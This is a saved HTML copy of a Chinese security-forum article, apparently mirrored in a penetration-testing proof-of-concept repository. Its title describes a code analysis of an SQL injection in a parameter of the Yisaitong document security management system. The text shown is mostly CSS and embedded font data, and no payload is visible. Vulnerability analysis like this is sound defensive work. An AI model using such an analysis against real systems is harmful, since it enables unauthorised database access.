mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-08-04 16:51:38 +00:00
735 lines
4.8 MiB
HTML
735 lines
4.8 MiB
HTML
|
<!DOCTYPE html> <html style><!--
|
|||
|
|
Page saved with SingleFile
|
|||
|
|
url: https://forum.butian.net/article/526
|
|||
|
|
--><meta charset=utf-8>
|
|||
|
|
<meta http-equiv=X-UA-Compatible content="IE=edge">
|
|||
|
|
<meta name=viewport content="width=device-width, initial-scale=1">
|
|||
|
|
<meta name=csrf-token content=sKaWQokrOTC3iA9XXzaH65D8iBGicq4jNmsDOLZX>
|
|||
|
|
<title>亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SecretLevelId SQL注入漏洞代码分析</title>
|
|||
|
|
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
|
|||
|
|
<meta name=description content="奇安信攻防社区-某通电子文档安全管理系统SQL注入漏洞 代码分析">
|
|||
|
|
<meta name=author content="QIANXIN Team">
|
|||
|
|
<meta name=copyright content="2021 QIANXIN.com">
|
|||
|
|
<style>@media (max-width:767px){}</style>
|
|||
|
|
<style>/*!
|
|||
|
|
* Bootstrap v3.4.1 (https://getbootstrap.com/)
|
|||
|
|
* Copyright 2011-2019 Twitter, Inc.
|
|||
|
|
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
|
|||
|
|
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}footer,nav{display:block}template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}img{border:0}button,input,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button{-webkit-appearance:button}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@media print{*,:after,:before{color:#000!important;text-shadow:none!important;background:0 0!important;-webkit-box-shadow:none!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" ("attr(href)")"}a[href^="#"]:after,a[href^="javascript:"]:after{content:""}pre{border:1px solid #999;page-break-inside:avoid}img{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}}@font-face{font-family:"Glyphicons Halflings";src:/* original URL: https://forum.butian.net/static/css/bootstrap/fonts/glyphicons-halflings-regular.woff2 */url(data:font/woff2;base64,d09GMgABAAAAAEZsAA8AAAAAsVwAAEYJAAECTQAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGiAGYACMcggEEQgKgqkkgeVlATYCJAOGdAuEMAAEIAWHIgeVUT93ZWJmBhtljDXsmI+A80Cgwj/+vggK2vaIIBusdPb/n5SghozBk8fY3CwzKw8ycQ3LRhauWU8b7AQmPrHpsWLSbaQ1gVqO5kgksapZihmcvXvsSAlqZIYL1YkM/LIl97nZp395IqcEA/f21yuNQLmMXb2rZZ/7e/rS+3aQoE5jiykOu275k8k/fj/okKRo8gD/nl/nJmkfxsrIHdGdBcGkiz+6PvzlXksg+3a0LRtj240x7fSAEokyS6Dhebf1LCdu5KvgAAco8DNFd2ngQgUXgqAmqf8L6c5UtGxo2DBNGtLY2tKGZOVZ2HLx77Kss250ad5d3Xl1cpW0vK77me4TVlhzag6hop7lZ01uGarTmUiBV5Wpw9QIIHIy9D5pVGBWN7jNUiixqMnPGuD/K6BvNvMnY8XIQrCP5gbrNOe31s653X+Hg4vjv5quVAldYVtRZDwzd3E4LI6F7nJUSRahOOESHI4wPkW4P/kqRajnl6aVI8/6NyeN7N39hlMJDAtvY/vKt+1fizcmIyrRKym9s6DQKzRhAbBBNrZjjOd5sdmjhmYoYhlG6ebk/+m0JDt7IFlBwzF2UC10R/j/jOHAsRXNIvuwldsBQ8JmLSBXgveuAprUmc51S9awSwjjI63tDuSs1ipLhjzb/AQgKNHf69T31/9a/mDZqwzltVuXJepZBVSKrHslr8mKJIitEKBze2/v7RmcF/KIgxjVu+92dCJw4Jw0YMjq36mKz6R9bwxg47PdFPonbhRl3D4K5EceNXMAevNfTvMKklBL06Z2bVXeC8m+e3q93PLu8/+fGfh/+IyHIjNgbA2SHAOWVyPUkL1eGEArjSwHY7nJa2+pjUFPG3AVbnW1p9R685Z6Sin13M6lHveY2zHHfeHh/0893n+ttoB4vlLGxGDBSolgp3GDFaWCVXMvvyv4a9J2xzF4bBrd3+dqEmwFlkVs7FxuRIzIw8a2r1aGseb/0Gpnm3taZOWJCHo3jwsUNf/fIQR4bcI1b8JbBxy9v3Xv+ya3rzHagkgQQmtB4uwIcXLqzlKQxA2jt7AWjyhcZ2j0EBTIN4ns0op5jz2GSLVa81VQaOnQJDgQUmfTBcQYgHrCZ82tyU46i+AAMXWsJNyFr6Shnj5S/V3l+hSXDqasIp/0Zje8lwv1S69efyeYquu9M5MrRS+8xF6JWVU1XahOQhcu3sqLpdI438Urzs2POI/5LHyJe018jEGKEeV1YXzQYYiSf+yO1d7LhdWdJQAKf2xLR6JQ7SwXTnUU5tzUa/5j7zhtWEDa02T/F8yYP3/x/NrzoudZ0ybP/nvq9pT4s8fPDj/bUNworhRHil22v8/G5K/kT+SP5Lfk1+SX5AZyLbmSXExGyQg5lywmp5N55DhyrPu0+zP3H9yfuD9wv+8+6n7b/br7FXPo5P8Fi54S0BCi00THCKR68zH6oT8SXFU1FnE9rdl00XrUkg6GJlqQbmqiJeltTbQifbyJ1nRr3kQbundooi09/22iHb1CE+3p9Tc28fSugyY60rvJcXQiC9YxOpMVrOvQlaypdTv0IktfoS9KZNZjMJZssvUcMB2yxSdeAxZCtvk4VkO21XpnsAayvawPBlsgO8r6ZOwK2VnWF2J/yIN1HQ6HvKl1O5xAnip9AQZ5iXwMLqmsJ0M+E1xnPRvyOeBW68WQrwG3W2+GfGfwoPVekB8MnrY+ivxkvAo5rc/H++QX7tjF+JQKKkV8QaUOj+MbKk2tW+NbKm1P3A7fUel6HD9Q6W7dGz9SKVmPwW9UJlvPAVUqi5U1EMBT2QxNQgv+7AShpfBbsxMKrYTfb1lEaK0Y1Xvs0Sx9MTxmjSYCNmikGIYnj4F/B8qlVSNWqAjeEa28H6GlRftEfyJUwaXeqdAGokFEOYP/ZUK5OqkHBhXEJQ8CT5zBINLQBBPxgofYRhJ1im4gFjc/JVIDRzQihLhmqWfHwUbquoEgDmE9gpEts9VRl+G9eStCvSzE+NAyw8sT1oU1opWH8JmEjHhuoQUVzqoEZiohobPm62zifEdYUfgg3oNVcJTkCsVFdSDCQJ4Bj6blLfCABB9Eby42WVr2gi0mYT5mEj+bAKuTTo9OnKIJXdRPL147XNoOwkrKDc9CBsdFc0pyGQSqkBkBoMSa9cYPFCfyhWcSL+Pj0UIXJZ+hHm8gH0P16rpulTeL3DoFfPV5g0t0sib3JKfYc698ufV3UIj5xFxpXb4kWhJAKwHNDLa21YA5MHhdu3K4rSW+yNUr9gdSVaxFbYcrFtywqqM7d6B1rMA5L0m8BdQ3yDfVprlR/mx1XKZ50A5XixBOKes4idywdlnuKnW0bQKUobG/6eKp4gS6bSgJZgbKRb3y/0c4sgyiaiNJrL1SjswX+XoMI3G437ffAQYJhClZoNckiwvh0JuGY18lv20teyEwLWALO+HlhazxFGh5VvXkwV1IdiEJzx90HGG9XEvvxRAeBqVbzDF7GgMi52ogNkDsljNUMCWlE78P6c6YIsfUmcZaSYZH5AabU5P3jYIusxHEzqNwB4HG06xTxjFl6fvZk8TYm535DFnBHv92uzgaCGSxXLFCoRdsoVP7/lIpBtIT04bn+a+WroALewJJitOG9NIlnZSvPvsw0I7aprNc8CeUY2e9MiU0oFGORKEKMM2SM0KyIslNjtWOJoDbimhJFcfC2qfSUmcQt01FpKGpobaaDUm9zigHqd7VNVWWRF0MffIdmQdi7Tgkl4fsOKg+8+FYIAGyB2
|
|||
|
|
<style>/*!
|
|||
|
|
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
|
|||
|
|
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
|
|||
|
|
*/@font-face{font-family:"FontAwesome";src:/* original URL: https://forum.butian.net/static/css/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 */url(data:font/woff2;base64,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
|
|||
|
|
<style>@media (min-width:1200px){.navbar-form{width:235px}}@media (min-width:768px){.navbar-form .form-control{width:100%}}@media (max-width:767px){.global-nav{width:100%;text-align:center;z-index:1000}}@media (max-width:767px){}.global-nav .nav{height:44px;padding:0}.navbar-form .btn{position:absolute;top:8px;right:30px;color:#999;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.navbar-form .btn:hover,.navbar-form .btn:focus{color:#777}pre{white-space:pre-wrap}@media (min-width:768px){}@media (min-width:992px){}@media (min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}button,input,textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mb-50{margin-bottom:50px}.mt-10{margin-top:10px}.mt-15{margin-top:15px}.mt-30{margin-top:30px}.mt-60{margin-top:60px}.ml-10{margin-left:10px}.mr-5{margin-right:5px}.span-line{margin-left:8px;margin-right:8px;color:#999}.logo{float:left;margin:0;display:inline-block;width:150px}.logo a{display:block;height:50px;width:145px;background-image:/* original URL: https://forum.butian.net/css/default/logo.svg */url(data:image/svg+xml;base64,PHN2ZyBpZD0i5Zu+5bGCXzEiIGRhdGEtbmFtZT0i5Zu+5bGCIDEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmlld0JveD0iMCAwIDQyNi4xMyAxMTEuNDIiPjxkZWZzPjxzdHlsZT4uY2xzLTF7ZmlsbDojZmZmO308L3N0eWxlPjwvZGVmcz48dGl0bGU+5aWH5a6J5L+h5pS76Ziy56S+5Yy6X2xvZ288L3RpdGxlPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTExMiw1Ny4zM3YtNGgzNy43OHY0aC00LjM5VjcxLjE4cS4wOCw1LjUzLTUuMTksNS40NGgtNC44OXYtNGgyLjM0YzEuMiwwLDEuNzgtLjYyLDEuNzUtMS45M1Y1Ny4zM1ptMS44LTExLjkydi00aDEzLjg1VjM4LjkzaDYuNDh2Mi41MWgxMy45M3Y0SDEzNi4zNXEzLDIuNTEsMTAuOTIsNC4zMXYzLjQ3UTEzNiw1MS42NSwxMzAuODcsNDcuNXEtNS4xLDQuMTQtMTYuMzYsNS42OVY0OS43MmM1LjI1LTEuMiw4Ljg4LTIuNjQsMTAuOTItNC4zMVptMi4wOSwyNy4yOFY1OS43NmgxOS4zN3Y3LjM2Yy4xMSwzLjgzLTEuNjcsNS42OC01LjM1LDUuNTdabTUuNDgtNGg2LjQ1YzEuMzkuMDksMi4wNS0uNjEsMi0yLjA5VjYzLjc4aC04LjQxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE1My42Nyw1OC43MlY1NC41M2g0LjY5VjUwLjMxaDYuNTJ2NC4yMmgxNS42OVY1MC4zMWg2LjUzdjQuMjJoNC44MXY0LjE5aC01LjA2YTE1LjM2LDE1LjM2LDAsMCwxLTcuNTcsMTEuODgsOTIuNiw5Mi42LDAsMCwwLDEyLjIxLDIuMzR2NHEtMTIuMTMtMS4yNS0xOC43OC0zLjQ3LTYuNTcsMi4yMi0xOC43LDMuNDd2LTRhMTA0LDEwNCwwLDAsMCwxMi4xNy0yLjM0LDE1LjA2LDE1LjA2LDAsMCwxLTcuNTctMTEuODhabTM2LjYxLTE2Ljg2djcuMzZoLTYuMTVWNDZIMTYxLjM3djMuMjJoLTYuMTVWNDEuODZoMTMuODlWMzkuMDloNy4ydjIuNzdaTTE3Mi43NSw2OC4yMXE2LjY5LTMuMTgsNy42MS05LjQ5SDE2NS4wOVExNjUuOTMsNjUsMTcyLjc1LDY4LjIxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE5OSw3N1Y1Mi43M2EyNywyNywwLDAsMS0zLjQ3LDEuNDNWNTAuMzVhMTcuMiwxNy4yLDAsMCwwLDUuOS0xMWg1LjlhMzIuODYsMzIuODYsMCwwLDEtMi42OCw3LjdWNzdabTcuNzQtMzF2LTRoMTBWMzkuM2g2Ljd2Mi43NmgxMC4xMnY0Wm0xLjM0LDMwLjVWNjIuMjNIMjMxLjd2Ny43cS4xNyw2LjgxLTYuMTUsNi42MVptLjEzLTI0di0zLjhoMjMuNDJ2My44Wm0wLDYuN1Y1NS40MWgyMy40MnYzLjgxWm0xNy44NiwxMC42MlY2Ni4ySDIxMy43MXY2LjMyaDEwLjEyQzIyNS4zOSw3Mi42MywyMjYuMTMsNzEuNzQsMjI2LjA1LDY5Ljg0WiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTIzNy43Niw0Ni40NnYtNGgxNC40OHY0SDI0OFY2NS4yNGMxLjQyLS4zLDMtLjcxLDQuNzMtMS4yMXY0LjE0YTU1LjQxLDU1LjQxLDAsMCwxLTE1LjE0LDMuNzdWNjYuNzljMS4yNS0uMDgsMi43OC0uMjQsNC42LS40NlY0Ni40NlptMTMuNDMsOC4wN1Y1MC44MXE0LjY5LTQsNS40NC0xMS41NWg2LjExYTMyLjMxLDMyLjMxLDAsMCwxLTEuMDUsNC40NGgxMy43N3Y0aC0zcS0uODQsMTEuODUtNS44NiwxOC4yYTQzLjI2LDQzLjI2LDAsMCwwLDguNDksNi44MnY0LjQ0YTQ5LjQxLDQ5LjQxLDAsMCwxLTEyLTcuNTMsNTIuMTMsNTIuMTMsMCwwLDEtMTIuNjQsNy41N1Y3Mi44MUE0MC4wNyw0MC4wNywwLDAsMCwyNTkuNzMsNjZhMzQuMzgsMzQuMzgsMCwwLDEtNS42MS0xMi44QTIxLjc4LDIxLjc4LDAsMCwxLDI1MS4xOSw1NC41M1ptOC4yNS0zLjcyYTM2LjQsMzYuNCwwLDAsMCwzLjc2LDEwLjVxMi43MS00Ljg5LDMuNDMtMTMuNTZIMjU5LjlhMTUuMSwxNS4xLDAsMCwxLTIuNDcsMy4wNloiLz48cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Ik0yODAuNTYsNzYuOTFWNDAuNjRoMTMuNzN2NGEyNS44NiwyNS44NiwwLDAsMS0yLjY0LDEwLDExLjMyLDExLjMyLDAsMCwxLDMsNy40cS4xNyw4LjUzLTcuOT
|
|||
|
|
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}.navbar-inverse{background-color:#2a8c70;border-color:#2b7a5c}.navbar-inverse .navbar-nav>li>a{color:#fff;padding-left:6px;padding-right:6px}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#008151}@media (max-width:767px){}@media (max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#E7F2ED;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}.btn-primary{border-color:#008151;background-color:#009a61;color:#fff}.btn-primary.active,.btn-primary:active,.btn-primary:focus,.btn-primary:hover,.open>.btn-primary.dropdown-toggle{border-color:#00432a;background-color:#006741;color:#fff}.btn-primary.active,.btn-primary:active,.open>.btn-primary.dropdown-toggle{background-image:none}.btn-success{border-color:#4cae4c;background-color:#5cb85c;color:#fff}</style>
|
|||
|
|
<style>@font-face{font-family:qax-design-icons;src:/* original URL: https://forum.butian.net/static/js/qaxd/fonts/qax-design-icons.woff */url(data:font/woff;base64,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